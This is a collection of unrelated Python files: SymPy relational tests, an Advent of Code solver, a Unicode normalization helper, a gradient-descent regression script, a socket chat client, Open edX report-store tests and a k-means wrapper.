res = Relational(y, e, '<=')
assert Le(y, x + x**2) == res
res = Relational(y, e, '>')
assert Gt(y, x + x**2) == res
res = Relational(y, e, '>=')
assert Ge(y, x + x**2) == res
res = Relational(y, e, '!=')
assert Ne(y, x + x**2) == res
def test_Eq():
assert Eq(x**2) == Eq(x**2, 0)
assert Eq(x**2) != Eq(x**2, 1)
assert Eq(x, x) # issue 5719
# issue 6116
p = Symbol('p', positive=True)
assert Eq(p, 0) is S.false
def test_rel_Infinity():
# NOTE: All of these are actually handled by sympy.core.Number, and do
# not create Relational objects.
assert (oo > oo) is S.false
assert (oo > -oo) is S.true
assert (oo > 1) is S.true
assert (oo < oo) is S.false
assert (oo < -oo) is S.false
assert (oo < 1) is S.false
assert (oo >= oo) is S.true
assert (oo >= -oo) is S.true
assert (oo >= 1) is S.true
assert (oo <= oo) is S.true
assert (oo <= -oo) is S.false
assert (oo <= 1) is S.false
assert (-oo > oo) is S.false
assert (-oo > -oo) is S.false
assert (-oo > 1) is S.false
assert (-oo < oo) is S.true
assert (-oo < -oo) is S.false
assert (-oo < 1) is S.true
assert (-oo >= oo) is S.false
assert (-oo >= -oo) is S.true
assert (-oo >= 1) is S.false
assert (-oo <= oo) is S.true
assert (-oo <= -oo) is S.true
assert (-oo <= 1) is S.true
def test_bool():
assert Eq(0, 0) is S.true
assert Eq(1, 0) is S.false
assert Ne(0, 0) is S.false
assert Ne(1, 0) is S.true
assert Lt(0, 1) is S.true
assert Lt(1, 0) is S.false
assert Le(0, 1) is S.true
assert Le(1, 0) is S.false
assert Le(0, 0) is S.true
assert Gt(1, 0) is S.true
assert Gt(0, 1) is S.false
assert Ge(1, 0) is S.true
assert Ge(0, 1) is S.false
assert Ge(1, 1) is S.true
assert Eq(I, 2) is S.false
assert Ne(I, 2) is S.true
raises(TypeError, lambda: Gt(I, 2))
raises(TypeError, lambda: Ge(I, 2))
raises(TypeError, lambda: Lt(I, 2))
raises(TypeError, lambda: Le(I, 2))
a = Float('.000000000000000000001', '')
b = Float('.0000000000000000000001', '')
assert Eq(pi + a, pi + b) is S.false
def test_rich_cmp():
assert (x < y) == Lt(x, y)
assert (x <= y) == Le(x, y)
assert (x > y) == Gt(x, y)
assert (x >= y) == Ge(x, y)
def test_doit():
from sympy import Symbol
p = Symbol('p', positive=True)
n = Symbol('n', negative=True)
np = Symbol('np', nonpositive=True)
nn = Symbol('nn', nonnegative=True)
assert Gt(p, 0).doit() is S.true
assert Gt(p, 1).doit() == Gt(p, 1)
assert Ge(p, 0).doit() is S.true
assert Le(p, 0).doit() is S.false
assert Lt(n, 0).doit() is S.true
assert Le(np, 0).doit() is S.true
assert Gt(nn, 0).doit() == Gt(nn, 0)
assert Lt(nn, 0).doit() is S.false
assert Eq(x, 0).doit() == Eq(x, 0)
def test_new_relational():
x = Symbol('x')
assert Eq(x) == Relational(x, 0) # None ==> Equality
assert Eq(x) == Relational(x, 0, '==')
assert Eq(x) == Relational(x, 0, 'eq')
assert Eq(x) == Equality(x, 0)
assert Eq(x, -1) == Relational(x, -1) # None ==> Equality
assert Eq(x, -1) == Relational(x, -1, '==')
assert Eq(x, -1) == Relational(x, -1, 'eq')
assert Eq(x, -1) == Equality(x, -1)
assert Eq(x) != Relational(x, 1) # None ==> Equality
assert Eq(x) != Relational(x, 1, '==')
assert Eq(x) != Relational(x, 1, 'eq')
assert Eq(x) != Equality(x, 1)
assert Eq(x, -1) != Relational(x, 1) # None ==> Equality
assert Eq(x, -1) != Relational(x, 1, '==')
assert Eq(x, -1) != Relational(x, 1, 'eq')
assert Eq(x, -1) != Equality(x, 1)
assert Ne(x, 0) == Relational(x, 0, '!=')
assert Ne(x, 0) == Relational(x, 0, '<>')
assert Ne(x, 0) == Relational(x, 0, 'ne')
assert Ne(x, 0) == Unequality(x, 0)
assert Ne(x, 0) != Relational(x, 1, '!=')
assert Ne(x, 0) != Relational(x, 1, '<>')
assert Ne(x, 0) != Relational(x, 1, 'ne')
assert Ne(x, 0) != Unequality(x, 1)
assert Ge(x, 0) == Relational(x, 0, '>=')
assert Ge(x, 0) == Relational(x, 0, 'ge')
assert Ge(x, 0) == GreaterThan(x, 0)
assert Ge(x, 1) != Relational(x, 0, '>=')
assert Ge(x, 1) != Relational(x, 0, 'ge')
assert Ge(x, 1) != GreaterThan(x, 0)
assert (x >= 1) == Relational(x, 1, '>=')
assert (x >= 1) == Relational(x, 1, 'ge')
assert (x >= 1) == GreaterThan(x, 1)
assert (x >= 0) != Relational(x, 1, '>=')
assert (x >= 0) != Relational(x, 1, 'ge')
assert (x >= 0) != GreaterThan(x, 1)
assert Le(x, 0) == Relational(x, 0, '<=')
assert Le(x, 0) == Relational(x, 0, 'le')
assert Le(x, 0) == LessThan(x, 0)
assert Le(x, 1) != Relational(x, 0, '<=')
assert Le(x, 1) != Relational(x, 0, 'le')
assert Le(x, 1) != LessThan(x, 0)
assert (x <= 1) == Relational(x, 1, '<=')
assert (x <= 1) == Relational(x, 1, 'le')
assert (x <= 1) == LessThan(x, 1)
assert (x <= 0) != Relational(x, 1, '<=')
assert (x <= 0) != Relational(x, 1, 'le')
assert (x <= 0) != LessThan(x, 1)
assert Gt(x, 0) == Relational(x, 0, '>')
assert Gt(x, 0) == Relational(x, 0, 'gt')
assert Gt(x, 0) == StrictGreaterThan(x, 0)
assert Gt(x, 1) != Relational(x, 0, '>')
assert Gt(x, 1) != Relational(x, 0, 'gt')
assert Gt(x, 1) != StrictGreaterThan(x, 0)
assert (x > 1) == Relational(x, 1, '>')
assert (x > 1) == Relational(x, 1, 'gt')
assert (x > 1) == StrictGreaterThan(x, 1)
assert (x > 0) != Relational(x, 1, '>')
assert (x > 0) != Relational(x, 1, 'gt')
assert (x > 0) != StrictGreaterThan(x, 1)
assert Lt(x, 0) == Relational(x, 0, '<')
assert Lt(x, 0) == Relational(x, 0, 'lt')
assert Lt(x, 0) == StrictLessThan(x, 0)
assert Lt(x, 1) != Relational(x, 0, '<')
assert Lt(x, 1) != Relational(x, 0, 'lt')
assert Lt(x, 1) != StrictLessThan(x, 0)
assert (x < 1) == Relational(x, 1, '<')
assert (x < 1) == Relational(x, 1, 'lt')
assert (x < 1) == StrictLessThan(x, 1)
assert (x < 0) != Relational(x, 1, '<')
assert (x < 0) != Relational(x, 1, 'lt')
assert (x < 0) != StrictLessThan(x, 1)
# finally, some fuzz testing
from random import randint
from sympy.core.compatibility import unichr
for i in range(100):
while 1:
strtype, length = (unichr, 65535) if randint(0, 1) else (chr, 255)
relation_type = strtype(randint(0, length))
if randint(0, 1):
relation_type += strtype(randint(0, length))
if relation_type not in ('==', 'eq', '!=', '<>', 'ne', '>=', 'ge',
'<=', 'le', '>', 'gt', '<', 'lt', ':=',
'+=', '-=', '*=', '/=', '%='):
break
raises(ValueError, lambda: Relational(x, 1, relation_type))
assert all(Relational(x, 0, op).rel_op == '==' for op in ('eq', '=='))
assert all(Relational(x, 0, op).rel_op == '!=' for op in ('ne', '<>', '!='))
assert all(Relational(x, 0, op).rel_op == '>' for op in ('gt', '>'))
assert all(Relational(x, 0, op).rel_op == '<' for op in ('lt', '<'))
assert all(Relational(x, 0, op).rel_op == '>=' for op in ('ge', '>='))
assert all(Relational(x, 0, op).rel_op == '<=' for op in ('le', '<='))
def test_relational_bool_output():
# https://github.com/sympy/sympy/issues/5931
raises(TypeError, lambda: bool(x > 3))
raises(TypeError, lambda: bool(x >= 3))
raises(TypeError, lambda: bool(x < 3))
raises(TypeError, lambda: bool(x <= 3))
raises(TypeError, lambda: bool(Eq(x, 3)))
raises(TypeError, lambda: bool(Ne(x, 3)))
def test_relational_logic_symbols():
# See issue 6204
assert (x < y) & (z < t) == And(x < y, z < t)
assert (x < y) | (z < t) == Or(x < y, z < t)
assert ~(x < y) == Not(x < y)
assert (x < y) >> (z < t) == Implies(x < y, z < t)
assert (x < y) << (z < t) == Implies(z < t, x < y)
assert (x < y) ^ (z < t) == Xor(x < y, z < t)
assert isinstance((x < y) & (z < t), And)
assert isinstance((x < y) | (z < t), Or)
assert isinstance(~(x < y), GreaterThan)
assert isinstance((x < y) >> (z < t), Implies)
assert isinstance((x < y) << (z < t), Implies)
assert isinstance((x < y) ^ (z < t), (Or, Xor))
def test_univariate_relational_as_set():
assert (x > 0).as_set() == Interval(0, oo, True, True)
assert (x >= 0).as_set() == Interval(0, oo)
assert (x < 0).as_set() == Interval(-oo, 0, True, True)
assert (x <= 0).as_set() == Interval(-oo, 0)
assert Eq(x, 0).as_set() == FiniteSet(0)
assert Ne(x, 0).as_set() == Interval(-oo, 0, True, True) + \
Interval(0, oo, True, True)
assert (x**2 >= 4).as_set() == Interval(-oo, -2) + Interval(2, oo)
@XFAIL
def test_multivariate_relational_as_set():
assert (x*y >= 0).as_set() == Interval(0, oo)*Interval(0, oo) + \
Interval(-oo, 0)*Interval(-oo, 0)
def test_Not():
assert Not(Equality(x, y)) == Unequality(x, y)
assert Not(Unequality(x, y)) == Equality(x, y)
assert Not(StrictGreaterThan(x, y)) == LessThan(x, y)
assert Not(StrictLessThan(x, y)) == GreaterThan(x, y)
assert Not(GreaterThan(x, y)) == StrictLessThan(x, y)
assert Not(LessThan(x, y)) == StrictGreaterThan(x, y)
def test_evaluate():
assert str(Eq(x, x, evaluate=False)) == 'Eq(x, x)'
assert Eq(x, x, evaluate=False).doit() == S.true
assert str(Ne(x, x, evaluate=False)) == 'Ne(x, x)'
assert Ne(x, x, evaluate=False).doit() == S.false
assert str(Ge(x, x, evaluate=False)) == 'x >= x'
assert str(Le(x, x, evaluate=False)) == 'x <= x'
assert str(Gt(x, x, evaluate=False)) == 'x > x'
assert str(Lt(x, x, evaluate=False)) == 'x < x'
def assert_all_ineq_raise_TypeError(a, b):
raises(TypeError, lambda: a > b)
raises(TypeError, lambda: a >= b)
raises(TypeError, lambda: a < b)
raises(TypeError, lambda: a <= b)
raises(TypeError, lambda: b > a)
raises(TypeError, lambda: b >= a)
raises(TypeError, lambda: b < a)
raises(TypeError, lambda: b <= a)
def assert_all_ineq_give_class_Inequality(a, b):
"""All inequality operations on `a` and `b` result in class Inequality."""
from sympy.core.relational import _Inequality as Inequality
assert isinstance(a > b, Inequality)
assert isinstance(a >= b, Inequality)
assert isinstance(a < b, Inequality)
assert isinstance(a <= b, Inequality)
assert isinstance(b > a, Inequality)
assert isinstance(b >= a, Inequality)
assert isinstance(b < a, Inequality)
assert isinstance(b <= a, Inequality)
def test_imaginary_compare_raises_TypeError():
# See issue #5724
assert_all_ineq_raise_TypeError(I, x)
def test_complex_compare_not_real():
# two cases which are not real
y = Symbol('y', imaginary=True)
z = Symbol('z', complex=True, real=False)
for w in (y, z):
assert_all_ineq_raise_TypeError(2, w)
# some cases which should remain un-evaluated
t = Symbol('t')
x = Symbol('x', real=True)
z = Symbol('z', complex=True)
for w in (x, z, t):
assert_all_ineq_give_class_Inequality(2, w)
def test_imaginary_and_inf_compare_raises_TypeError():
# See pull request #7835
y = Symbol('y', imaginary=True)
assert_all_ineq_raise_TypeError(oo, y)
assert_all_ineq_raise_TypeError(-oo, y)
def test_complex_pure_imag_not_ordered():
raises(TypeError, lambda: 2*I < 3*I)
# more generally
x = Symbol('x', real=True, nonzero=True)
y = Symbol('y', imaginary=True)
z = Symbol('z', complex=True)
assert_all_ineq_raise_TypeError(I, y)
t = I*x # an imaginary number, should raise errors
assert_all_ineq_raise_TypeError(2, t)
t = -I*y # a real number, so no errors
assert_all_ineq_give_class_Inequality(2, t)
t = I*z # unknown, should be unevaluated
assert_all_ineq_give_class_Inequality(2, t)
def test_x_minus_y_not_same_as_x_lt_y():
"""
A consequence of pull request #7792 is that `x - y < 0` and `x < y`
are not synonymous.
"""
x = I + 2
y = I + 3
raises(TypeError, lambda: x < y)
assert x - y < 0
ineq = Lt(x, y, evaluate=False)
raises(TypeError, lambda: ineq.doit())
assert ineq.lhs - ineq.rhs < 0
t = Symbol('t', imaginary=True)
x = 2 + t
y = 3 + t
ineq = Lt(x, y, evaluate=False)
raises(TypeError, lambda: ineq.doit())
assert ineq.lhs - ineq.rhs < 0
# this one should give error either way
x = I + 2
y = 2*I + 3
raises(TypeError, lambda: x < y)
raises(TypeError, lambda: x - y < 0)
def test_nan_equality_exceptions():
# See issue #7774
import random
assert Equality(nan, nan) is S.false
assert Unequality(nan, nan) is S.true
# See issue #7773
A = (x, S(0), S(1)/3, pi, oo, -oo)
assert Equality(nan, random.choice(A)) is S.false
assert Equality(random.choice(A), nan) is S.false
assert Unequality(nan, random.choice(A)) is S.true
assert Unequality(random.choice(A), nan) is S.true
def test_nan_inequality_raise_errors():
# See discussion in pull request #7776. We test inequalities with
# a set including examples of various classes.
for q in (x, S(0), S(10), S(1)/3, pi, S(1.3), oo, -oo, nan):
assert_all_ineq_raise_TypeError(q, nan)
def test_nan_complex_inequalities():
# Comparisons of NaN with non-real raise errors, we're not too
# fussy whether it's the NaN error or the complex error.
for r in (I, zoo, Symbol('z', imaginary=True)):
assert_all_ineq_raise_TypeError(r, nan)
def test_complex_infinity_inequalities():
raises(TypeError, lambda: zoo > 0)
raises(TypeError, lambda: zoo >= 0)
raises(TypeError, lambda: zoo < 0)
raises(TypeError, lambda: zoo <= 0)
def test_inequalities_symbol_name_same():
"""Using the operator and functional forms should give same results."""
# We test all combinations from a set
# FIXME: could replace with random selection after test passes
A = (x, y, S(0), S(1)/3, pi, oo, -oo)
for a in A:
for b in A:
assert Gt(a, b) == (a > b)
assert Lt(a, b) == (a < b)
assert Ge(a, b) == (a >= b)
assert Le(a, b) == (a <= b)
for b in (y, S(0), S(1)/3, pi, oo, -oo):
assert Gt(x, b, evaluate=False) == (x > b)
assert Lt(x, b, evaluate=False) == (x < b)
assert Ge(x, b, evaluate=False) == (x >= b)
assert Le(x, b, evaluate=False) == (x <= b)
for b in (y, S(0), S(1)/3, pi, oo, -oo):
assert Gt(b, x, evaluate=False) == (b > x)
assert Lt(b, x, evaluate=False) == (b < x)
assert Ge(b, x, evaluate=False) == (b >= x)
assert Le(b, x, evaluate=False) == (b <= x)
def test_inequalities_symbol_name_same_complex():
"""Using the operator and functional forms should give same results.
With complex non-real numbers, both should raise errors.
"""
# FIXME: could replace with random selection after test passes
for a in (x, S(0), S(1)/3, pi, oo):
raises(TypeError, lambda: Gt(a, I))
raises(TypeError, lambda: a > I)
raises(TypeError, lambda: Lt(a, I))
raises(TypeError, lambda: a < I)
raises(TypeError, lambda: Ge(a, I))
raises(TypeError, lambda: a >= I)
raises(TypeError, lambda: Le(a, I))
raises(TypeError, lambda: a <= I)
def test_inequalities_cant_sympify_other():
# see issue 7833
from operator import gt, lt, ge, le
bar = "foo"
for a in (x, S(0), S(1)/3, pi, I, zoo, oo, -oo, nan):
for op in (lt, gt, le, ge):
raises(TypeError, lambda: op(a, bar))
def test_ineq_avoid_wild_symbol_flip():
# see issue #7951, we try to avoid this internally, e.g., by using
# __lt__ instead of "<".
from sympy.core.symbol import Wild
p = symbols('p', cls=Wild)
# x > p might flip, but Gt should not:
assert Gt(x, p) == Gt(x, p, evaluate=False)
# Previously failed as 'p > x':
e = Lt(x, y).subs({y: p})
assert e == Lt(x, p, evaluate=False)
# Previously failed as 'p <= x':
e = Ge(x, p).doit()
assert e == Ge(x, p, evaluate=False)
def test_issue_8245():
a = S("6506833320952669167898688709329/5070602400912917605986812821504")
q = a.n(10)
assert (a == q) is True
assert (a != q) is False
assert (a > q) == False
assert (a < q) == False
assert (a >= q) == True
assert (a <= q) == True
a = sqrt(2)
r = Rational(str(a.n(30)))
assert (r == a) is False
assert (r != a) is True
assert (r > a) == True
assert (r < a) == False
assert (r >= a) == True
assert (r <= a) == False
a = sqrt(2)
r = Rational(str(a.n(29)))
assert (r == a) is False
assert (r != a) is True
assert (r > a) == False
assert (r < a) == True
assert (r >= a) == False
assert (r <= a) == True
assert Eq(log(cos(2)**2 + sin(2)**2), 0) == True
def test_issue_8449():
p = Symbol('p', nonnegative=True)
assert Lt(-oo, p)
assert Ge(-oo, p) is S.false
assert Gt(oo, -p)
assert Le(oo, -p) is S.false
def test_simplify():
assert simplify(x*(y + 1) - x*y - x + 1 < x) == (x > 1)
r = S(1) < -x
# until relationals have an _eval_simplify method
# if there is no simplification to do on either side
# only the canonical form is returned
assert simplify(r) == r.canonical
def test_equals():
w, x, y, z = symbols('w:z')
f = Function('f')
assert Eq(x, 1).equals(Eq(x*(y + 1) - x*y - x + 1, x))
assert Eq(x, y).equals(x < y, True) == False
assert Eq(x, f(1)).equals(Eq(x, f(2)), True) == f(1) - f(2)
assert Eq(f(1), y).equals(Eq(f(2), y), True) == f(1) - f(2)
assert Eq(x, f(1)).equals(Eq(f(2), x), True) == f(1) - f(2)
assert Eq(f(1), x).equals(Eq(x, f(2)), True) == f(1) - f(2)
assert Eq(w, x).equals(Eq(y, z), True) == False
assert Eq(f(1), f(2)).equals(Eq(f(3), f(4)), True) == f(1) - f(3)
assert (x < y).equals(y > x, True) == True
assert (x < y).equals(y >= x, True) == False
assert (x < y).equals(z < y, True) == False
assert (x < y).equals(x < z, True) == False
assert (x < f(1)).equals(x < f(2), True) == f(1) - f(2)
assert (f(1) < x).equals(f(2) < x, True) == f(1) - f(2)
def test_reversed():
assert (x < y).reversed == (y > x)
assert (x <= y).reversed == (y >= x)
assert Eq(x, y, evaluate=False).reversed == Eq(y, x, evaluate=False)
assert Ne(x, y, evaluate=False).reversed == Ne(y, x, evaluate=False)
assert (x >= y).reversed == (y <= x)
assert (x > y).reversed == (y < x)
def test_canonical():
c = [i.canonical for i in (
x + y < z,
x + 2 > 3,
x < 2,
S(2) > x,
x**2 > -x/y,
Gt(3, 2, evaluate=False)
)]
assert [i.canonical for i in c] == c
assert [i.reversed.canonical for i in c] == c
assert not any(i.lhs.is_Number and not i.rhs.is_Number for i in c)
c = [i.reversed.func(i.rhs, i.lhs, evaluate=False).canonical for i in c]
assert [i.canonical for i in c] == c
assert [i.reversed.canonical for i in c] == c
assert not any(i.lhs.is_Number and not i.rhs.is_Number for i in c)
@XFAIL
def test_issue_8444():
x = symbols('x', real=True)
assert (x <= oo) == (x >= -oo) == True
x = symbols('x')
assert x >= floor(x)
assert (x < floor(x)) == False
assert Gt(x, floor(x)) == Gt(x, floor(x), evaluate=False)
assert Ge(x, floor(x)) == Ge(x, floor(x), evaluate=False)
assert x <= ceiling(x)
assert (x > ceiling(x)) == False
assert Lt(x, ceiling(x)) == Lt(x, ceiling(x), evaluate=False)
assert Le(x, ceiling(x)) == Le(x, ceiling(x), evaluate=False)
i = symbols('i', integer=True)
assert (i > floor(i)) == False
assert (i < ceiling(i)) == False
def test_issue_10304():
d = cos(1)**2 + sin(1)**2 - 1
assert d.is_comparable is False # if this fails, find a new d
e = 1 + d*I
assert simplify(Eq(e, 0)) is S.false
def test_issue_10401():
x = symbols('x')
fin = symbols('inf', finite=True)
inf = symbols('inf', infinite=True)
inf2 = symbols('inf2', infinite=True)
zero = symbols('z', zero=True)
nonzero = symbols('nz', zero=False, finite=True)
assert Eq(1/(1/x + 1), 1).func is Eq
assert Eq(1/(1/x + 1), 1).subs(x, S.ComplexInfinity) is S.true
assert Eq(1/(1/fin + 1), 1) is S.false
T, F = S.true, S.false
assert Eq(fin, inf) is F
assert Eq(inf, inf2) is T and inf != inf2
assert Eq(inf/inf2, 0) is F
assert Eq(inf/fin, 0) is F
assert Eq(fin/inf, 0) is T
assert Eq(zero/nonzero, 0) is T and ((zero/nonzero) != 0)
assert Eq(inf, -inf) is F
assert Eq(fin/(fin + 1), 1) is S.false
o = symbols('o', odd=True)
assert Eq(o, 2*o) is S.false
p = symbols('p', positive=True)
assert Eq(p/(p - 1), 1) is F
def test_issue_10633():
assert Eq(True, False) == False
assert Eq(False, True) == False
assert Eq(True, True) == True
assert Eq(False, False) == True
def test_issue_10927():
x = symbols('x')
assert str(Eq(x, oo)) == 'Eq(x, oo)'
assert str(Eq(x, -oo)) == 'Eq(x, -oo)'
|
instructions = [line.strip().split(" ") for line in open("input.txt", "r")]
h_pos = 0
depth = 0
aim = 0
for i in instructions:
num = int(i[1])
# Structural Pattern Matching only in Python 3.10 - https://www.python.org/dev/peps/pep-0622/
match i[0]:
case 'forward':
h_pos += num
depth += aim * num
case 'down':
aim += num
case 'up':
aim -= num
print(f"Final horizonal position: {h_pos} - Final depth: {depth} - Multiplied: {h_pos * depth}")
|
# Once upon a time, in 2020 we discovered that
# some texts would be incorrectly tokenized into words in the UI of Zeeguu.
#
# The problem was always around an å character
#
# Turns out that although visually the letter is the same there
# are two possibilities of representing the letter in unicode:
# 1. latin small letter a with ring above
# 2. latin small letter a + ̊ combining ring above
# When the second would happen in a text, the tokenizer
# would break.
import unicodedata
def flatten_composed_unicode_characters(content):
# Normalization mode can be :
# -- NFC, or 'Normal Form Composed' returns composed characters
# -- NFD, 'Normal Form Decomposed' gives decomposed characters (base letter + combining mark)
# -- ...
# We thus use NFC
#
# (See also: https://stackoverflow.com/a/16467505/1200070)
return unicodedata.normalize('NFC', content)
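# A minimal usage sketch (illustrative strings, not taken from Zeeguu data):
# the decomposed sequence 'a' + combining ring above (U+030A) normalizes to the
# single precomposed character U+00E5, so both spellings tokenize alike.
#   flatten_composed_unicode_characters('a\u030a') == '\u00e5'   # True
#   len('a\u030a'), len('\u00e5')                                # (2, 1)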
|
import numpy as np
import sys
import matplotlib.pyplot as pl
## returns the predicted y (based on feature dataset (X) and weights (Theta))
def f(X,th):
return X.dot(th.T)
## returns the cost (residual error) for predicted y
def J(X,y,th):
m=X.shape[0]
y_hat=X.dot(th.T)
cost=np.sum((y_hat-y)**2)/(2*m)
return cost
## finds the "good" values for the weights (Theta)
## Gradient descent (optimization function)
def GD (X,y,th,alpha,niters):
m=X.shape[0]
cost=np.zeros((niters,1))
for i in range(0,niters):
y_hat=X.dot(th.T)
error=((y_hat-y)*X).sum(0)/m
th = th-(alpha*(error))
cost[i]=J(X,y,th)
return th,cost
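## In formula form, the loop above performs batch gradient descent:
##   theta := theta - alpha * (1/m) * sum_i (x_i . theta^T - y_i) * x_i
## and records the cost J after every update so convergence can be plotted.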
def featureScaling(X):
X=X-np.min(X,0)
den=np.max(X,0)-np.min(X,0)
return X/den
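## Worked example (hypothetical values): featureScaling rescales each column
## to the [0, 1] range, e.g.
##   featureScaling(np.array([[1., 10.], [2., 20.], [3., 30.]]))
##   -> [[0. , 0. ], [0.5, 0.5], [1. , 1. ]]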
def RMSE(X,y,th):
m=X.shape[0]
y_hat=f(X,th)
error=((y_hat-y)**2).sum()/m
return np.sqrt(error)
if __name__ == "__main__":
if len(sys.argv) < 2:  ## the dataset file path is required
print('Usage: python %s <dataset file name (full path)>' % sys.argv[0])
exit(0)
try:
fin=open(sys.argv[1]) ## open the dataset file
except:
print('Could not open',sys.argv[1])
exit(0)
## rows will be a list of lists, e.g., [[example 1],[example 2],...,[example m]]
rows=[l.split(',') for l in fin.readlines()] ## the values are separated by comma
m=len(rows) ## how many lists rows has, i.e., how many examples in the dataset
## how many features are in a given list
d = len(rows[0])-1 ## subtract 1 from the length to discard the label (y)
y = np.array([l[d:d+1] for l in rows],dtype=float) ## vector of dataset labels
X = np.array([l[0:d] for l in rows],dtype=float) ## matrix of dataset features
### Feature scaling
Xori=X.copy() ## save the original X
X=featureScaling(X)
Theta=np.zeros((1,d+1)) ## Initialize Theta with zeros
X=np.insert(X,0,1,axis=1) ## inserts a column of 1's
tsize=int(m*0.7) ## size of the training set
Xtr=X[:tsize,:] ## from the first row to tsize-1, all columns
Xte=X[tsize:,:] ## from the tsize row to the end, all columns
ytr=y[:tsize]
yte=y[tsize:]
### Call gradient descent to find the "good" values to Theta
Theta,cost=GD(Xtr,ytr,Theta,0.000001,2000)
pl.plot(cost)
pl.show()
print('RMSE:',RMSE(Xte,yte,Theta))
if d>1:
print('Sorry, we cannot plot more than 1 feature')
exit(0)
## predict new labels from training set
y_hat=Xtr.dot(Theta.T)
## Plot the predicted y's against the ground truth (y)
## first the X regarding the ground-truth
pl.plot(Xtr[:,1:],ytr,'.',c='b')
## now X against the predicted values
pl.plot(Xtr[:,1:],y_hat,'-',c='g')
pl.show()
## Now, let's check the performance on the test set
## y_hat is built from Xte, i.e., the test set
y_hat=Xte.dot(Theta.T)
pl.plot(Xte[:,1:],yte,'.',c='b')
## now X against the predicted values
pl.plot(Xte[:,1:],y_hat,'-',c='g')
pl.show()
print("Test cost", J(Xte,yte,Theta))
|
import sys, socket, select, threading
def prompt(user) :
sys.stdout.write('%s> ' % user)
sys.stdout.flush()
if __name__ == "__main__":
if len(sys.argv) < 3:
print('Usage : python %s user host' % sys.argv[0])
sys.exit()
(user, host), port = sys.argv[1:3], 5001
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try :
server_sock.connect((host, port))
except :
print('Unable to connect')
sys.exit()
print('Start')
def listen():
while True:
read_sockets, write_sockets, error_sockets = select.select([server_sock], [], [])
try:
data = server_sock.recv(4096).decode()
except:
break
sys.stdout.write('\r%s\n' % data)
prompt(user)
print('\rTerminated')
t = threading.Thread(target=listen)
t.start()
prompt(user)
while True:
msg = sys.stdin.readline().strip()
if not msg:
server_sock.close()
break
try:
server_sock.send(('%s| %s' % (user, msg)).encode())
except:
break
prompt(user)
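# Wire-format sketch (read off the send() call above, values illustrative):
# each outgoing line is "<user>| <message>", e.g. "alice| hello there",
# while incoming data from the server is printed verbatim on its own line.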
|
"""
Tests for instructor_task/models.py.
"""
import copy
import time
from io import StringIO
import pytest
from django.conf import settings
from django.test import SimpleTestCase, TestCase, override_settings
from opaque_keys.edx.locator import CourseLocator
from common.test.utils import MockS3BotoMixin
from lms.djangoapps.instructor_task.models import TASK_INPUT_LENGTH, InstructorTask, ReportStore
from lms.djangoapps.instructor_task.tests.test_base import TestReportMixin
class TestInstructorTasksModel(TestCase):
"""
Test validations in instructor task model
"""
def test_task_input_valid_length(self):
"""
Test allowed length of task_input field
"""
task_input = 's' * TASK_INPUT_LENGTH
with pytest.raises(AttributeError):
InstructorTask.create(
course_id='dummy_course_id',
task_type='dummy type',
task_key='dummy key',
task_input=task_input,
requester='dummy requester',
)
class ReportStoreTestMixin:
"""
Mixin for report store tests.
"""
def setUp(self):
super().setUp()
self.course_id = CourseLocator(org="testx", course="coursex", run="runx")
def create_report_store(self):
"""
Subclasses should override this and return their report store.
"""
pass # lint-amnesty, pylint: disable=unnecessary-pass
def test_links_for_order(self):
"""
Test that ReportStore.links_for() returns file download links
in reverse chronological order.
"""
report_store = self.create_report_store() # lint-amnesty, pylint: disable=assignment-from-no-return
assert report_store.links_for(self.course_id) == []
report_store.store(self.course_id, 'old_file', StringIO())
time.sleep(1) # Ensure we have a unique timestamp.
report_store.store(self.course_id, 'middle_file', StringIO())
time.sleep(1) # Ensure we have a unique timestamp.
report_store.store(self.course_id, 'new_file', StringIO())
assert [link[0] for link in report_store.links_for(self.course_id)] == ['new_file', 'middle_file', 'old_file']
class LocalFSReportStoreTestCase(ReportStoreTestMixin, TestReportMixin, SimpleTestCase):
"""
Test the old LocalFSReportStore configuration.
"""
def create_report_store(self):
"""
Create and return a DjangoStorageReportStore using the old
LocalFSReportStore configuration.
"""
return ReportStore.from_config(config_name='GRADES_DOWNLOAD')
class DjangoStorageReportStoreLocalTestCase(ReportStoreTestMixin, TestReportMixin, SimpleTestCase):
"""
Test the DjangoStorageReportStore implementation using the local
filesystem.
"""
def create_report_store(self):
"""
Create and return a DjangoStorageReportStore configured to use the
local filesystem for storage.
"""
test_settings = copy.deepcopy(settings.GRADES_DOWNLOAD)
test_settings['STORAGE_KWARGS'] = {'location': settings.GRADES_DOWNLOAD['ROOT_PATH']}
with override_settings(GRADES_DOWNLOAD=test_settings):
return ReportStore.from_config(config_name='GRADES_DOWNLOAD')
class DjangoStorageReportStoreS3TestCase(MockS3BotoMixin, ReportStoreTestMixin, TestReportMixin, SimpleTestCase):
"""
Test the DjangoStorageReportStore implementation using S3 stubs.
"""
def create_report_store(self):
"""
Create and return a DjangoStorageReportStore configured to use S3 for
storage.
"""
test_settings = copy.deepcopy(settings.GRADES_DOWNLOAD)
test_settings['STORAGE_CLASS'] = 'storages.backends.s3boto.S3BotoStorage'
test_settings['STORAGE_KWARGS'] = {
'bucket': settings.GRADES_DOWNLOAD['BUCKET'],
'location': settings.GRADES_DOWNLOAD['ROOT_PATH'],
}
with override_settings(GRADES_DOWNLOAD=test_settings):
self.mocked_connection.create_bucket(settings.GRADES_DOWNLOAD['STORAGE_KWARGS']['bucket'])
return ReportStore.from_config(config_name='GRADES_DOWNLOAD')
class TestS3ReportStorage(TestCase):
"""
Test the S3ReportStorage to make sure that configuration overrides from settings.FINANCIAL_REPORTS
are used instead of default ones.
"""
def test_financial_report_overrides(self):
"""
Test that CUSTOM_DOMAIN from FINANCIAL_REPORTS is used to construct the file url instead of the domain
defined via the AWS_S3_CUSTOM_DOMAIN setting.
"""
with override_settings(FINANCIAL_REPORTS={
'STORAGE_TYPE': 's3',
'BUCKET': 'edx-financial-reports',
'CUSTOM_DOMAIN': 'edx-financial-reports.s3.amazonaws.com',
'ROOT_PATH': 'production',
}):
report_store = ReportStore.from_config(config_name="FINANCIAL_REPORTS")
# Make sure CUSTOM_DOMAIN from FINANCIAL_REPORTS is used to construct file url
assert 'edx-financial-reports.s3.amazonaws.com' in report_store.storage.url('')
|
import typing
import numpy
import sklearn
import _pqkmeans
class BKMeans(sklearn.base.BaseEstimator, sklearn.base.ClusterMixin):
def __init__(self, k, input_dim, subspace_dim=8, iteration=10, verbose=False):
super(BKMeans, self).__init__()
self._impl = _pqkmeans.BKMeans(k, input_dim, subspace_dim, iteration, verbose)
def predict_generator(self, x_test):
# type: (typing.Iterable[typing.Iterable[float]]) -> Any
for vec in x_test:
yield self._impl.predict_one(vec)
